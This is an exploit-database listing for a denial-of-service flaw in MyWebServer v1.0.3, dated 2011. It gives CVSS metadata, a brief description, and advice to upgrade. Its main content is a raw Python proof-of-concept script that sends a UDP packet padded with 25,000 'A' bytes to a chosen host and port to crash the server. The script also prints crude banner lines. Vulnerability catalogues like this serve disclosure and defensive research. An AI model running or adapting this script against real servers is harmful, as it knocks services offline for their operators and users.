header-logo
Suggest Exploit
vendor:
MyWebServer
by:
X-h4ck
7.8
CVSS
HIGH
Denial of Service
399
CWE
Product Name: MyWebServer
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:mywebserver:mywebserver:1.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows XP
2011

MyWebServer v1.0.3 Denial Of Service

MyWebServer v1.0.3 is vulnerable to a Denial of Service attack. An attacker can send a crafted UDP packet with a large number of 'A' characters to the server, causing it to crash. This vulnerability affects Windows 7 (home premium) and Windows XP SP2 EN.

Mitigation:

Upgrade to the latest version of MyWebServer.
Source

Exploit-DB raw data:

# #########################################################################
#~ Title         : MyWebServer v1.0.3 Denial Of Service  
#~ Software      : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/MyWebServer.shtml
#~ Tested on     : Windows 7 (home premium) / Windows XP SP2 EN
#~ Date          : 27/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/ 
#~ Email         : mem001@live.com 
#~ Greetz        : Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon - mywisdom
# #########################################################################
#Attention : It will crash on google chrome!

#!/usr/bin/python
print " MyWebServer v1.0.3 Denial Of Service"
print " PirateAL@ // Aint no pussy made where we came from \\ "
print " "

import socket
 
host = '127.0.0.1' #IP
port = 80 #PORT

buff = "\x41" * 25000
aww = "A"
exp = "\x00\x01" + buff + "\0" + aww + "\0" 
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    print "Connecting..."
    print "w8..."
    sock.sendto(exp, (host, port))
    print sock.recv(1024)
    sock.close()
except:
    print "hmmm, done"

Navigation

Suggest Exploit

Services By CQR